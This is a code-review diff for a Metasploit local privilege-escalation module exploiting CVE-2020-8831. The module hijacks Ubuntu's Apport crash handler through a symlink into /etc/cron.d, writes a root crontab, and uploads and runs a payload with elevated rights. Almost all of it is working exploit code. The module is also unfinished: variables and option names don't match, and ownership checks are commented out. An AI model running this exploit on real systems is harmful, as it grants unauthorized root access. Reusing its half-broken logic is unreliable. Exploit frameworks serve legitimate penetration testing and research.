Finish check method

Author: gardnerapp

modules/exploits/linux/local/cve_2020_8831_apport_symlink_privesc.rb

@@ -1,39 +1,45 @@
-# Randomness itself is a give away of exploitation
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
+  prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
   include Msf::Post::File
-  include Msf::Post::File::FileStat
 
-  # TODO targets in the initialize method and how they work
-  # TODO other priv esc vectors, startup folders, periodic scripts 
+  # TODO: targets in the initialize method and how they work
+  # TODO other priv esc vectors, startup folders, periodic scripts
   # change name to apport exploit, checking lesser version of apport in check method, are they vunerable?
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Apport Symlink Hijacking Privilege Escalation ',
         'Description' => %q{
-        	On some Ubuntu releases such as Xenial Xerus 16.04.7 the Apport 2.20 crash handler is vulnerable
-        	to symlink hijacking. Following a crash Apport will write reports to /var/lock/apport/lock, 
-        	an attacker who can create a symlink to a privileged directory via /var/lock/apport will be 
-        	able to create files with global 0777 permissions. This module exploits this weaknes by creating a
-          symbolic link to /etc/cron.d/ in order to write a system crontab that will execute a payload with 
+          On some Ubuntu releases such as Xenial Xerus 16.04.7 the Apport 2.20 crash handler is vulnerable
+          to symlink hijacking. Following a crash Apport will write reports to /var/lock/apport/lock,
+          an attacker who can create a symlink to a privileged directory via /var/lock/apport will be
+          able to create files with global 0777 permissions. This module exploits this weaknes by creating a
+          symbolic link to /etc/cron.d/ in order to write a system crontab that will execute a payload with
           elevated permissions.
         },
         'License' => MSF_LICENSE,
-        'Author' => [ 
-        	'gardnerapp' # mirageinfosec.cloud
+        'Author' => [
+          'gardnerapp' # mirageinfosec.cloud
         ],
         'References' => [
           [
-           'URL', 'https://nostarch.com/zero-day', # pg. 59
-           'URL', 'https://ubuntu.com/security/CVE-2020-8831',
-           'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8831'
+            'URL', 'https://nostarch.com/zero-day', # pg. 59
+            'URL', 'https://ubuntu.com/security/CVE-2020-8831',
+            'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8831'
           ]
         ],
-        'Platform' => 'linux',
+        'Platform' => ['linux'],
+        'SessionTypes' => ['shell', 'meterpreter'],
         'Targets' => [
           [
             'Linux_Binary',
@@ -45,62 +51,50 @@ def initialize(info = {})
             'Linux_Command',
             {
               'Arch' => ARCH_CMD
-               'Payload' =>
-                {
-                  'BadChars' => "\x22\x27"
-                }
             }
           ]
         ],
-        'Payload' => {
-          'BadChars' => "\x00"
-        },
         'Privileged' => false,
         'DisclosureDate' => '2 April 2020',
         'DefaultTarget' => 0,
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
-        },
+        }
       )
     )
-
-    register_options(
+    register_options [
       OptString.new('WRITABLE_DIR', [true, 'A directory we can write to.', '/tmp']),
       OptString.new('PAYLOAD_FILENAME', [true, 'Name of payload', Rex::Text.rand_text_alpha(rand(8..12))]),
       OptString.new('CRON_FILENAME', [true, 'Name of the cron file', Rex::Text.rand_text_alpha(rand(8..12))]),
       OptString.new('CRON_INTERVAL', [true, 'Specify how often the Cron should run. Default is every minute.', '* * * * *'])
-    )
+    ]
   end
 
   def check
-  	return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
-
-  	return CheckCode::Safe('Target is not Ubuntu') unless kernel_version =~ /[uU]buntu/
+    return CheckCode::Safe('Platform is not Linux') unless session.platform == 'linux'
 
-    sys_info = get_sysinfo
-    puts system_info
+    # Check apport version
+    if !command_exists?('apport-cli')
+      return CheckCode::Safe('apport-cli does not appear to be installed or in the $PATH')
+    end
 
-    distro = sysinfo[:distro]
-    puts distro
-    version = sysinfo[:version]
-    puts system_info
+    apport = cmd_exec('apport-cli --version').to_s
 
-  	# Check apport version
-  	if !command_exists?('apport-cli')
-  		return CheckCode::Safe('apport-cli does not appear to be installed or in the $PATH') 
-  	end 
+    return CheckCode::Detected('Unable to determine apport version') if apport.blank?
 
-  	apport = cmd_exec('apport-cli --version').to_s 
+    # todo determine if prior versions of apport which are NOT vulnerable
+    apport_version = Rex::Version.new(apport.split('-').first)
 
-  	return CheckCode::Detected('Unable to determine apport version') if apport.blank?
+    vulnerable_version = Rex::Version.new('2.20.11')
 
-  	version = Rex::Version.new(apport.split('-').first)
+    if apport_version == vulnerable_version
+      vprint_good("Apport appears to be vulnerable.")
+      return CheckCode::Appears
+    end 
 
-  	vulnerable = Rex::Version.new '2.20'
-  	# Were there prior versions of apport which are NOT vulnerableii
-  	# if version < vulnerable return bad 
+    CheckCode::Safe
   end
 
   # hijack symlink by creating apport crash
@@ -113,30 +107,32 @@ def hijack_apport
     cmd_exec 'sleep 10s & kill -11 $!'
 
     # need method for seeing if file is owned by root and combine with and gate
+    # TODO want to check if file is root owned to ensure exploit workedd 
     # if uid method does not work remove Msf::Post::File::FileStat
-    if !writable?('/etc/crontab/lock') || uid('/etc/crontab/lock') != 0
-      fail_with(Failue::NotFound, 'Exploit was unable to create a crontab owned by root.')
+    #puts "uid(/etc/crontab/lock) #{uid('/etc/crontab/lock')}"
+    if !writable?('/etc/crontab/lock') #|| uid('/etc/crontab/lock') != 0
+      fail_with(Failure::NotFound, 'Exploit was unable to create a crontab owned by root.')
     end
-  end 
+  end
 
-    def write_payload
-     print_status 'Uploading payload'
+  def write_payload
+    print_status 'Uploading payload'
 
-     pay_dir = datastore['WritableDir']
+    pay_dir = datastore['WritableDir']
 
-     pay_dir += '/' unless pay_dir.ends_with? '/'
+    pay_dir += '/' unless pay_dir.ends_with? '/'
 
-     pay_file = datastore['PayloadFilename']
+    pay_file = datastore['PayloadFilename']
 
-     @pay_dest = "#{pay_dir}#{pay_file}"
+    @pay_dest = "#{pay_dir}#{pay_file}"
 
     # create the payload
     if target.arch.first == ARCH_CMD
       payload = payload.encoded
       upload_and_chmodx pay_dest, payload
-    else 
+    else
       upload_and_chmodx pay_dest, generate_payload_exe
-    end 
+    end
   end
 
   def write_cron
@@ -152,4 +148,4 @@ def exploit
 
     write_cron
   end
-end
+end